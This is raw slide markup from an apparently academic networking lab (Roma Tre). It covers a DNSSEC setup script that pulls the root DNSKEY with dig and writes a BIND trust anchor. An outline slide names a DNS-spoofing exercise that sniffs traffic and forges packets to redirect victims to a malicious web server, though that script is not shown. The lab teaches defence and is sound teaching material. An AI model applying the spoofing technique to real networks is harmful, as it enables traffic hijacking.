              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There are two routers, called r1 and r2, there are four hosts, called pc1, pc2, pc3 and pc4, and three DNS levels, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dnsuni</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>they are connected via  three LANs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
              <a:t>we force their MAC addresses to be easily readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>we will learn how to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>iptables command to block traffic for DNS resolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script to sniff traffic and create fake packet to redirect traffic to malicious web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E5D5B4C-22D0-0B2C-A0A5-2C20457B7E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E58F9C-BA66-9FD2-348D-D8125AD8D638}"/>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8199" name="Rectangle 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97078D1C-067C-00DB-925C-5BF925961B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9332918" y="5"/>
            <a:ext cx="171608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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Computer Networks Research Group Roma Tre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E3A14-7744-9453-6DD3-86CA0C0FEB22}"/>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71A1D6BD-D438-AE2C-A3AB-D85155D08630}"/>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3C199FD7-04E6-D996-4A5A-69030A88391E}"/>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E6ABB07C-CA96-BE69-5B29-EC6899176E7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E90E18F8-731D-6326-78A9-C7050F7663C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A147334B-8757-1FFA-A12B-FAD3E3D90AF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a: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 /var/cache/bind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770 /var/cache/bind</a:t>
              </a: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    echo " Waiting for key from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> (10.0.3.5)..."</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    while ! dig @10.0.3.5 . DNSKEY | grep -q "257 3 13"; do</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        sleep 2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    RECORD=$(dig @10.0.3.5 . DNSKEY | grep "257 3 13" | head -n 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    F=$(echo $RECORD | awk '{print $5}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    P=$(echo $RECORD | awk '{print $6}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    A=$(echo $RECORD | awk '{print $7}')</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    K=$(echo $RECORD | awk '{$1=$2=$3=$4=$5=$6=$7=""; print $0}' | tr -d '[:space:]') </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C03B8763-68A7-1B70-A178-405E4CB06502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>c4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ECBD1D-5E78-5518-8685-AA4053DBE67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="216361" y="5625054"/>
            <a:ext cx="3470176" cy="742088"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21396"/>
              <a:gd name="adj2" fmla="val -8765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extract the actual cryptographic string</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980D280A-49CA-49EC-F46A-C079AD5D195D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6590180" y="4418845"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73754"/>
              <a:gd name="adj2" fmla="val 33843"/>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These three lines use awk to "cut out" pieces of the DNS record</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2413110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7A52B-67BE-C858-6036-08EB5A316992}"/>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B74DB8DD-6147-B952-E361-9B4636C7815D}"/>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01D9E26D-6247-F080-2B7F-54CC2D4C13D4}"/>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D785998B-BB57-44F8-E4EE-7BCCC8CD6263}"/>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B5958C4F-AFD1-3E60-21E7-2D8261A3C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="354370" y="1259628"/>
            <a:ext cx="11483260" cy="2167083"/>
            <a:chOff x="2372" y="3332"/>
            <a:chExt cx="3786" cy="309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280F59B3-A3E6-5820-DB42-9C948F0256DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2372" y="3361"/>
              <a:ext cx="3786" cy="28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echo "trust-anchors { \".\" static-key $F $P $A \"$K\"; };" &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> flush</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    echo "DNSSEC Trust Anchor configured with correct syntax!"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{198881A9-6D97-8DD7-1901-0AEFA866A5EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3332"/>
              <a:ext cx="622"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pc4.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFFB480A-4957-2089-F61F-111763798536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="354370" y="4104899"/>
            <a:ext cx="6129330" cy="1737999"/>
            <a:chOff x="126" y="2522"/>
            <a:chExt cx="2676" cy="648"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4C5851-76D5-D75F-9875-1712AEC89D56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="2594"/>
              <a:ext cx="2676" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 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buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.      IN  A     100.0.75.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 98">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715E9742-DDA4-FED5-31EE-7806E559B416}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="173" y="2522"/>
              <a:ext cx="1175" cy="145"/>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pc4</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noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C879D3F-9D20-A4CD-ED3D-7961D5F13C90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="3306576"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20186"/>
              <a:gd name="adj2" fmla="val -23779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writes the trust anchor to the trusted-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D6C812-EE8B-69F9-5B81-5DF717D055FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284388" y="3489537"/>
            <a:ext cx="3830316" cy="647027"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8337"/>
              <a:gd name="adj2" fmla="val -23595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ensures that BIND can read the newly created file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2781870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64464-D1D5-388A-EFF1-88CB9867EF41}"/>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91C03D28-0B51-EAB1-594E-F092F1015555}"/>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DC4DD50B-01CB-D776-30A3-D7A885EFACDE}"/>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B5E059E6-8A5E-9313-FD6A-9284D5E07F7B}"/>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E6121146-74F5-D32E-3318-7242D997B2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="193964" y="2028522"/>
            <a:ext cx="5289701" cy="2650995"/>
            <a:chOff x="3393" y="3438"/>
            <a:chExt cx="1744" cy="378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
